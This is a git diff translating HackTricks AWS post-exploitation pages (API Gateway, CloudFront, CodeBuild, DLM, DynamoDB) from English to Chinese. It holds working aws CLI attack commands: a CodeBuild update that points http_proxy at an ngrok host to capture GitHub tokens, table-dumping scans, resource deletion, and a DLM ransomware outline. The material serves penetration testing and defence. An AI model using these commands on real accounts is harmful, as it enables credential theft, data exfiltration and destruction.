--patch-operations op=repla # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. +**潜在影响**:削弱API的安全性,可能允许未经授权的访问或暴露敏感信息。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` -An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**. - +拥有权限 `apigateway:CreateApiKey`、`apigateway:UpdateApiKey`、`apigateway:CreateUsagePlan` 和 `apigateway:CreateUsagePlanKey` 的攻击者可以**创建新的API密钥,将其与使用计划关联,然后使用这些密钥未经授权访问API**。 ```bash # Create a new API key API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id') @@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp # Associate the API key with the usage plan aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY ``` - -**Potential Impact**: Unauthorized access to API resources, bypassing security controls. +**潜在影响**:未经授权访问API资源,绕过安全控制。 > [!NOTE] -> Need testing +> 需要测试 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md index 4a3c4ff21..e415ff360 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md @@ -1,35 +1,31 @@ -# AWS - CloudFront Post Exploitation +# AWS - CloudFront 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## CloudFront -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-cloudfront-enum.md {{#endref}} -### Man-in-the-Middle +### 中间人攻击 -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). +这篇 [**博客文章**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) 提出了几种不同的场景,其中可以将 **Lambda** 添加(或在已使用的情况下进行修改)到 **通过 CloudFront 的通信中**,目的是 **窃取** 用户信息(如会话 **cookie**)并 **修改** **响应**(注入恶意 JS 脚本)。 -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket +#### 场景 1:中间人攻击,其中 CloudFront 配置为访问某个存储桶的 HTML -- **Create** the malicious **function**. -- **Associate** it with the CloudFront distribution. -- Set the **event type to "Viewer Response"**. +- **创建** 恶意 **函数**。 +- **将其与 CloudFront 分发关联**。 +- 将 **事件类型设置为 "Viewer Response"**。 -Accessing the response you could steal the users cookie and inject a malicious JS. +访问响应后,您可以窃取用户的 cookie 并注入恶意 JS。 -#### scenario 2: MitM where CloudFront is already using a lambda function +#### 场景 2:中间人攻击,其中 CloudFront 已在使用 lambda 函数 -- **Modify the code** of the lambda function to steal sensitive information +- **修改 lambda 函数的代码** 以窃取敏感信息 -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). +您可以在这里查看 [**tf 代码以重现这些场景**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md index 54be4e299..204ffb1ec 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md @@ -1,88 +1,76 @@ -# AWS - CodeBuild Post Exploitation +# AWS - CodeBuild 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## CodeBuild -For more information, check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-codebuild-enum.md {{#endref}} -### Check Secrets +### 检查秘密 -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. +如果在 Codebuild 中设置了凭据以连接到 Github、Gitlab 或 Bitbucket,形式为个人令牌、密码或 OAuth 令牌访问,这些 **凭据将作为秘密存储在秘密管理器中**。\ +因此,如果您有权限读取秘密管理器,您将能够获取这些秘密并转向连接的平台。 {{#ref}} ../../aws-privilege-escalation/aws-secrets-manager-privesc.md {{#endref}} -### Abuse CodeBuild Repo Access +### 滥用 CodeBuild 仓库访问 -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: +为了配置 **CodeBuild**,它需要 **访问将要使用的代码仓库**。多个平台可能托管此代码:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. +**CodeBuild 项目必须具有** 对配置的源提供程序的访问权限,可以通过 **IAM 角色** 或使用 github/bitbucket **令牌或 OAuth 访问**。 -An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ -In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): +具有 **CodeBuild 中提升权限的攻击者** 可以滥用此配置的访问权限,泄露配置仓库的代码以及设置凭据有访问权限的其他仓库。\ +为了做到这一点,攻击者只需 **将仓库 URL 更改为配置凭据有访问权限的每个仓库**(请注意,aws 网站会为您列出所有这些):
-And **change the Buildspec commands to exfiltrate each repo**. +并且 **更改 Buildspec 命令以提取每个仓库**。 > [!WARNING] -> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -> Or does he? Check the next section +> 然而,这 **项任务是重复且乏味的**,如果配置了具有 **写权限** 的 github 令牌,攻击者 **将无法(滥)用这些权限**,因为他没有访问令牌。\ +> 或者他有吗?查看下一部分 -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: +### 从 AWS CodeBuild 泄露访问令牌 +您可以泄露在 CodeBuild 中授予的平台访问权限,例如 Github。检查是否授予了对外部平台的任何访问权限: ```bash aws codebuild list-source-credentials ``` - {{#ref}} aws-codebuild-token-leakage.md {{#endref}} ### `codebuild:DeleteProject` -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - +攻击者可以删除整个 CodeBuild 项目,导致项目配置丢失,并影响依赖该项目的应用程序。 ```bash aws codebuild delete-project --name ``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. +**潜在影响**:项目配置丢失和使用已删除项目的应用程序服务中断。 ### `codebuild:TagResource` , `codebuild:UntagResource` -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除CodeBuild资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws codebuild tag-resource --resource-arn --tags aws codebuild untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 ### `codebuild:DeleteSourceCredentials` -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - +攻击者可以删除 Git 存储库的源凭证,影响依赖该存储库的应用程序的正常运行。 ```sql aws codebuild delete-source-credentials --arn ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. +**潜在影响**:由于源凭证的删除,依赖受影响存储库的应用程序的正常功能受到干扰。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index c514d7a7c..227cb4d8d 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md @@ -2,73 +2,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: +## 恢复 Github/Bitbucket 配置的令牌 +首先,检查是否配置了任何源凭据,以便您可以泄露: ```bash aws codebuild list-source-credentials ``` +### 通过 Docker 镜像 -### Via Docker Image +如果你发现例如 Github 的认证已在账户中设置,你可以通过让 Codebuild **使用特定的 docker 镜像** 来运行项目的构建,从而 **提取** 该 **访问** (**GH token 或 OAuth token**)。 -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. +为此,你可以 **创建一个新的 Codebuild 项目** 或更改现有项目的 **环境** 以设置 **Docker 镜像**。 -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. +你可以使用的 Docker 镜像是 [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm)。这是一个非常基础的 Docker 镜像,将设置 **环境变量 `https_proxy`**、**`http_proxy`** 和 **`SSL_CERT_FILE`**。这将允许你拦截在 **`https_proxy`** 和 **`http_proxy`** 中指示的主机的大部分流量,并信任在 **`SSL_CERT_FILE`** 中指示的 SSL 证书。 -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. - -1. **Create & Upload your own Docker MitM image** - - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - - Create a **new Codebuild project** or **modify** the environment of an existing one. - - Set the project to use the **previously generated Docker image** +1. **创建并上传你自己的 Docker MitM 镜像** +- 按照仓库的说明设置你的代理 IP 地址并设置你的 SSL 证书,然后 **构建 docker 镜像**。 +- **不要设置 `http_proxy`** 以避免拦截对元数据端点的请求。 +- 你可以使用 **`ngrok`**,例如 `ngrok tcp 4444` 来将代理设置为你的主机。 +- 一旦你构建了 Docker 镜像,**将其上传到公共仓库**(Dockerhub, ECR...)。 +2. **设置环境** +- 创建一个 **新的 Codebuild 项目** 或 **修改** 现有项目的环境。 +- 设置项目使用 **之前生成的 Docker 镜像**。
-3. **Set the MitM proxy in your host** - -- As indicated in the **Github repo** you could use something like: +3. **在你的主机上设置 MitM 代理** +- 如 **Github 仓库** 中所示,你可以使用类似的东西: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` - > [!TIP] -> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +> 使用的 **mitmproxy 版本是 9.0.1**,据报道在版本 10 中这可能无法工作。 -4. **Run the build & capture the credentials** +4. **运行构建并捕获凭证** -- You can see the token in the **Authorization** header: +- 您可以在 **Authorization** 头中看到令牌: -
- -This could also be done from the aws cli with something like +
+这也可以通过 aws cli 以类似的方式完成。 ```bash # Create project using a Github connection aws codebuild create-project --cli-input-json file:///tmp/buildspec.json ## With /tmp/buildspec.json { - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } +"name": "my-demo-project", +"source": { +"type": "GITHUB", +"location": "https://github.com/uname/repo", +"buildspec": "buildspec.yml" +}, +"artifacts": { +"type": "NO_ARTIFACTS" +}, +"environment": { +"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM +"image": "docker.io/carlospolop/docker-mitm:v12", +"computeType": "BUILD_GENERAL1_SMALL", +"imagePullCredentialsType": "CODEBUILD" +} } ## Json @@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json # Start the build aws codebuild start-build --project-name my-project2 ``` +### 通过 insecureSSL -### Via insecureSSL - -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -- First you need to enumerate the current configuration with something like: +**Codebuild** 项目有一个名为 **`insecureSsl`** 的设置,该设置在网页中隐藏,您只能通过 API 更改它。\ +启用此选项后,Codebuild 可以连接到存储库 **而不检查** 平台提供的证书。 +- 首先,您需要使用类似以下的方式枚举当前配置: ```bash aws codebuild batch-get-projects --name ``` - -- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). - - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like: - +- 然后,使用收集到的信息,您可以将项目设置 **`insecureSsl`** 更新为 **`True`**。以下是我更新项目的示例,请注意最后的 **`insecureSsl=True`**(这是您需要从收集的配置中更改的唯一内容)。 +- 此外,还要添加环境变量 **http_proxy** 和 **https_proxy**,指向您的 tcp ngrok,如: ```bash aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' +--source '{ +"type": "GITHUB", +"location": "https://github.com/carlospolop/404checker", +"gitCloneDepth": 1, +"gitSubmodulesConfig": { +"fetchSubmodules": false +}, +"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", +"auth": { +"type": "CODECONNECTIONS", +"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" +}, +"reportBuildStatus": false, +"insecureSsl": true +}' \ +--environment '{ +"type": "LINUX_CONTAINER", +"image": "aws/codebuild/standard:5.0", +"computeType": "BUILD_GENERAL1_SMALL", +"environmentVariables": [ +{ +"name": "http_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +}, +{ +"name": "https_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +} +] +}' ``` - -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)运行 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例 ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="127.0.0.1", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- 最后,点击 **Build the project**,**凭证**将以 **明文**(base64)发送到 mitm 端口:
-### ~~Via HTTP protocol~~ +### ~~通过 HTTP 协议~~ -> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** +> [!TIP] > **这个漏洞在 2023 年 2 月 20 日那周的某个时候被 AWS 修复了(我想是星期五)。所以攻击者不能再利用它了 :)** -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. +具有 **提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌**,或者如果权限是通过 OAuth 配置的,则 **用于访问代码的临时 OAuth 令牌**。 -- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). +- 攻击者可以将环境变量 **http_proxy** 和 **https_proxy** 添加到 CodeBuild 项目,指向他的机器(例如 `http://5.tcp.eu.ngrok.io:14972`)。
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- 然后,将 github 仓库的 URL 更改为使用 HTTP 而不是 HTTPS,例如:`http://github.com/carlospolop-forks/TestActions` +- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)上运行来自 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例。 ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="0.0.0.0", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Next, click on **Build the project** or start the build from command line: - +- 接下来,点击 **Build the project** 或从命令行启动构建: ```sh aws codebuild start-build --project-name ``` - -- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- 最后,**凭证**将以**明文**(base64)发送到mitm端口:
> [!WARNING] -> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. +> 现在攻击者将能够从他的机器上使用令牌,列出它拥有的所有权限,并比直接使用CodeBuild服务更容易地(滥用)它。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md index f1c6fb394..405179302 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md @@ -8,17 +8,11 @@ ../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md {{#endref}} -### Enable / Disable Controls - -To further exploit an account, you might need to disable/enable Control Tower controls: +### 启用 / 禁用控制 +为了进一步利用一个账户,您可能需要禁用/启用 Control Tower 控制: ```bash aws controltower disable-control --control-identifier --target-identifier aws controltower enable-control --control-identifier --target-identifier ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md index baa309e53..f1707135a 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md @@ -1,99 +1,91 @@ -# AWS - DLM Post Exploitation +# AWS - DLM 后期利用 {{#include ../../../banners/hacktricks-training.md}} -## Data Lifecycle Manger (DLM) +## 数据生命周期管理器 (DLM) ### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy` -A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot. +勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后删除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS 账户的 KMS 密钥加密快照,并将加密的快照转移到不同的账户。或者,他们可能会将未加密的快照转移到他们管理的账户,然后在那里进行加密。尽管直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新的卷或快照来实现。 -Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type. +首先,将使用一个命令收集卷的信息,例如实例 ID、卷 ID、加密状态、附加状态和卷类型。 `aws ec2 describe-volumes` -Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs. - +其次,将创建生命周期策略。此命令使用 DLM API 设置一个生命周期策略,该策略会在指定时间自动对指定卷进行每日快照。它还会将特定标签应用于快照,并将卷的标签复制到快照中。policyDetails.json 文件包含生命周期策略的具体信息,例如目标标签、计划、用于加密的可选 KMS 密钥的 ARN,以及快照共享的目标账户,这些信息将记录在受害者的 CloudTrail 日志中。 ```bash aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json ``` - -A template for the policy document can be seen here: - +可以在这里看到政策文档的模板: ```bash { - "PolicyType": "EBS_SNAPSHOT_MANAGEMENT", - "ResourceTypes": [ - "VOLUME" - ], - "TargetTags": [ - { - "Key": "ExampleKey", - "Value": "ExampleValue" - } - ], - "Schedules": [ - { - "Name": "DailySnapshots", - "CopyTags": true, - "TagsToAdd": [ - { - "Key": "SnapshotCreator", - "Value": "DLM" - } - ], - "VariableTags": [ - { - "Key": "CostCenter", - "Value": "Finance" - } - ], - "CreateRule": { - "Interval": 24, - "IntervalUnit": "HOURS", - "Times": [ - "03:00" - ] - }, - "RetainRule": { - "Count": 14 - }, - "FastRestoreRule": { - "Count": 2, - "Interval": 12, - "IntervalUnit": "HOURS" - }, - "CrossRegionCopyRules": [ - { - "TargetRegion": "us-west-2", - "Encrypted": true, - "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", - "CopyTags": true, - "RetainRule": { - "Interval": 1, - "IntervalUnit": "DAYS" - } - } - ], - "ShareRules": [ - { - "TargetAccounts": [ - "123456789012" - ], - "UnshareInterval": 30, - "UnshareIntervalUnit": "DAYS" - } - ] - } - ], - "Parameters": { - "ExcludeBootVolume": false - } +"PolicyType": "EBS_SNAPSHOT_MANAGEMENT", +"ResourceTypes": [ +"VOLUME" +], +"TargetTags": [ +{ +"Key": "ExampleKey", +"Value": "ExampleValue" +} +], +"Schedules": [ +{ +"Name": "DailySnapshots", +"CopyTags": true, +"TagsToAdd": [ +{ +"Key": "SnapshotCreator", +"Value": "DLM" +} +], +"VariableTags": [ +{ +"Key": "CostCenter", +"Value": "Finance" +} +], +"CreateRule": { +"Interval": 24, +"IntervalUnit": "HOURS", +"Times": [ +"03:00" +] +}, +"RetainRule": { +"Count": 14 +}, +"FastRestoreRule": { +"Count": 2, +"Interval": 12, +"IntervalUnit": "HOURS" +}, +"CrossRegionCopyRules": [ +{ +"TargetRegion": "us-west-2", +"Encrypted": true, +"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", +"CopyTags": true, +"RetainRule": { +"Interval": 1, +"IntervalUnit": "DAYS" +} +} +], +"ShareRules": [ +{ +"TargetAccounts": [ +"123456789012" +], +"UnshareInterval": 30, +"UnshareIntervalUnit": "DAYS" +} +] +} +], +"Parameters": { +"ExcludeBootVolume": false +} } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md index d63689d9e..7962b57ee 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - DynamoDB Post Exploitation +# AWS - DynamoDB 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## DynamoDB -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md @@ -12,342 +12,292 @@ For more information check: ### `dynamodb:BatchGetItem` -An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). +具有此权限的攻击者将能够 **通过主键从表中获取项目**(您不能仅请求表的所有数据)。这意味着您需要知道主键(您可以通过获取表元数据(`describe-table`)来获取此信息)。 {{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb batch-get-item --request-items file:///tmp/a.json // With a.json { - "ProductCatalog" : { // This is the table name - "Keys": [ - { - "Id" : { // Primary keys name - "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those - } - } - ] - } +"ProductCatalog" : { // This is the table name +"Keys": [ +{ +"Id" : { // Primary keys name +"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those +} +} +] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb batch-get-item \ - --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ - --region +--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:GetItem` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: - +**与之前的权限类似,** 这允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值: ```json aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json // With a.json { "Id" : { - "N": "205" +"N": "205" } } ``` - -With this permission it's also possible to use the **`transact-get-items`** method like: - +使用此权限,还可以使用 **`transact-get-items`** 方法,如下所示: ```json aws dynamodb transact-get-items \ - --transact-items file:///tmp/a.json +--transact-items file:///tmp/a.json // With a.json [ - { - "Get": { - "Key": { - "Id": {"N": "205"} - }, - "TableName": "ProductCatalog" - } - } +{ +"Get": { +"Key": { +"Id": {"N": "205"} +}, +"TableName": "ProductCatalog" +} +} ] ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过定位表中的敏感信息进行间接权限提升 ### `dynamodb:Query` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. +**与之前的权限类似,** 这项权限允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值。它允许使用[比较子集](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html),但唯一允许与主键(必须出现)进行的比较是 "EQ",因此您无法使用比较在请求中获取整个数据库。 {{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json - // With a.json - { +// With a.json +{ "Id" : { - "ComparisonOperator":"EQ", - "AttributeValueList": [ {"N": "205"} ] - } +"ComparisonOperator":"EQ", +"AttributeValueList": [ {"N": "205"} ] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb query \ - --table-name TargetTable \ - --key-condition-expression "AttributeName = :value" \ - --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ - --region +--table-name TargetTable \ +--key-condition-expression "AttributeName = :value" \ +--expression-attribute-values '{":value":{"S":"TargetValue"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过定位表中的敏感信息进行间接权限提升 ### `dynamodb:Scan` -You can use this permission to **dump the entire table easily**. - +您可以使用此权限**轻松导出整个表**。 ```bash aws dynamodb scan --table-name #Get data inside the table ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 